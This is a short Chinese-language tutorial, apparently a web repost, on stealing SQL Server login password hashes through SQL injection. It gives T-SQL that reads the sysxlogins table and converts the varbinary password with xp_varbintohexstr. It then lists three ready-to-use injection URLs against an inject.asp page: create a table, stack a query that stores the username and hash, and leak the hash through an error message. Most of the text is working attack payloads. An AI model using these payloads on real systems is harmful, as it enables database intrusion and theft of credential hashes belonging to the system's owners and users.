sysxlogins表中的password字段是varbinary,是没有办法通过报错获得的。最近偶尔看到一个叫xp_varbintohexstr的扩展储存,便有了思路:
核心演示代码(查询分析器)
declare @p varbinary(64),@u varchar(16),@s varchar(128);
select top 1 @u = name,@p = password from (select top 1 * from sysxlogins where password is NOT NULL order by name ASC)T order by name DESC;
exec xp_varbintohexstr @p,@s OUT;
select User: + @u + /Hash: + @s;
理论的推导往往是可憎的,一下为本机asp+SA显错的测试结果:
Step.1
http://www.2cto.com/inject.asp?id=1;create+table+SQLhash(hash+varchar(2000))--
Step.2
http://www.2cto.com/inject.asp?id=1;declare+@p+varbinary(64),@u+varchar(16),@s+varchar(128);select+top+1+@u+=+name,@p+=+password+from+(select+top+1+*+from+master.dbo.sysxlogins+where+password+is+NOT+NULL+order+by+name+ASC)T+order+by+name+DESC;exec+master..xp_varbintohexstr+@p,@s+OUT;set+@s+=+User:+%2b+@u+%2b+/Hash:+%2b+@s;insert+into+SQLhash(hash)+values(@s)--
Step.3
http://www.2cto.com/inject.asp?id=1+and+(select+top+1+hash+from+SQLhash)=0-- |
